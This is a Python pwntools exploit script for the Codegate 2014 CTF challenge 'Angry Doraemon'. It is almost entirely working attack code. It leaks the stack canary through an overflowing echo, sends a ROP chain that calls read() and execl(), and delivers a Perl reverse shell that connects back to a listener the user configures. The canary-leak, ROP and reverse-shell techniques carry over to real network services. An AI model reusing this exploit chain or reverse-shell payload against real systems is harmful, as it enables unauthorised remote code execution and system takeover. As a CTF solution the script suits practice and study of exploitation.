#!/usr/bin/env python2
# Codegate Preliminary CTF 2014: Angry Doraemon
# https://github.com/ctfs/write-ups-2014/tree/master/codegate-preliminary-2014/angrydoraemon
from pwn import *
# 08048710 <execl@plt>:
# 8048710: ff 25 4c b0 04 08 jmp DWORD PTR ds:0x804b04c
# 8048716: 68 80 00 00 00 push 0x80
# 804871b: e9 e0 fe ff ff jmp 8048600 <setsockopt@plt-0x10>
# 08048620 <read@plt>:
# 8048620: ff 25 10 b0 04 08 jmp DWORD PTR ds:0x804b010
# 8048626: 68 08 00 00 00 push 0x8
# 804862b: e9 d0 ff ff ff jmp 8048600 <setsockopt@plt-0x10>
# Absolute addresses in the target binary (it is loaded at a fixed base, so
# no leak is needed for these). The two PLT entries are taken from the
# disassembly quoted above.
addr_read_plt = 0x08048620    # read@plt: pulls the stage-2 command into addr_buf
addr_execl_plt = 0x08048710   # execl@plt: final call of the chain
# "pop esi ; pop edi ; pop ebp ; ret" -- discards read()'s three arguments so
# the chain can fall through into the execl() call.
addr_pop3_ret = 0x080495bd
addr_bin_sh = 0x0804970d      # string used as execl()'s path and argv[0] (named as "/bin/sh")
addr_buf = 0x0804b0a0         # writable scratch buffer that read() fills with stage 2
socket_fd = 4                 # descriptor the target uses for the client socket (assumed; confirm)
r = remote('localhost', 8888)
def choose_action(n):
    """Pick entry ``n`` on the service's main menu.

    Waits for the last menu line and its ``>`` prompt before answering, so
    the choice is never sent ahead of the menu being printed.
    """
    menu_prompt = '6.Give up\n>'
    r.recvuntil(menu_prompt)
    r.sendline(str(n))
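# --- Stage 1: leak the stack canary ---------------------------------------
# Menu entry 4 asks "Are you sure? (y/n) " and echoes the answer back. The
# answer buffer is 10 bytes and sits directly below the canary, whose low
# byte is NUL: sending 11 'y's overwrites that NUL so the echo runs on and
# returns the other three canary bytes.
choose_action(4)
r.recvuntil('Are you sure? (y/n) ')
r.send('y' * 11)
r.recvuntil('y' * 10)
# recvn() blocks until all 4 bytes are in; recv(4) can return a short read
# when the echo arrives fragmented, and u32() would then raise.
canary = u32(r.recvn(4)) & 0xffffff00   # mask restores the NUL low byte
log.info('leaked canary: 0x%x' % canary)

# --- Reconnect --------------------------------------------------------------
# This connection's canary is now corrupted (low byte 'y'), so its handler
# will abort on return. A fresh connection gets a process with the same
# canary value -- assumes the service forks per client from one parent
# (TODO confirm against the target).
r.close()
r = remote('localhost', 8888)

# --- Stage 2: ROP chain -----------------------------------------------------
# Overflow layout: 10-byte answer buffer, canary, 12 bytes (saved registers
# or alignment) before the saved return address.
# Chain: read(socket_fd, addr_buf, stage2_len) pulls a command string into a
# writable buffer, pop3;ret cleans read()'s arguments, then
# execl(addr_bin_sh, addr_bin_sh, "-c", <command>, NULL).
stage2_len = 0x100
choose_action(4)
r.recvuntil('Are you sure? (y/n) ')
chain = [
    'A' * 10,
    p32(canary),
    'BBBB' * 3,
    p32(addr_read_plt),
    p32(addr_pop3_ret),        # read() returns here -> pop its 3 args
    p32(socket_fd),
    p32(addr_buf),
    p32(stage2_len),
    p32(addr_execl_plt),
    'CCCC',                    # execl()'s return address; never used
    p32(addr_bin_sh),          # path
    p32(addr_bin_sh),          # argv[0]
    p32(addr_buf),             # argv[1] = "-c"
    p32(addr_buf + 3),         # argv[2] = the command that follows "-c\0"
    p32(0),                    # argv terminator
]
r.send(''.join(chain))

# --- Stage 3: command string for execl() -----------------------------------
# Perl reverse shell to lhost:lport. 0.0.0.0 only works for a local test
# (on Linux connect() to it reaches the local host); point it at your
# listener for a real run.
lhost = '0.0.0.0'
lport = 4444
rev_shell = (
    'use Socket;$i="%s";$p=%d;'
    'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
    'if(connect(S,sockaddr_in($p,inet_aton($i)))){'
    'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
    'exec("/bin/sh -i");};'
) % (lhost, lport)
# Both strings are NUL-terminated in place: "-c" at addr_buf and the command
# at addr_buf + 3, matching the argv pointers in the chain.
stage2 = '-c\x00' + "perl -e '" + rev_shell + "'\x00"
# read() takes at most stage2_len bytes; anything longer would be silently
# truncated and the shell would never come back.
if len(stage2) > stage2_len:
    log.error('stage 2 is %d bytes, exceeds the %d-byte read'
              % (len(stage2), stage2_len))
r.send(stage2)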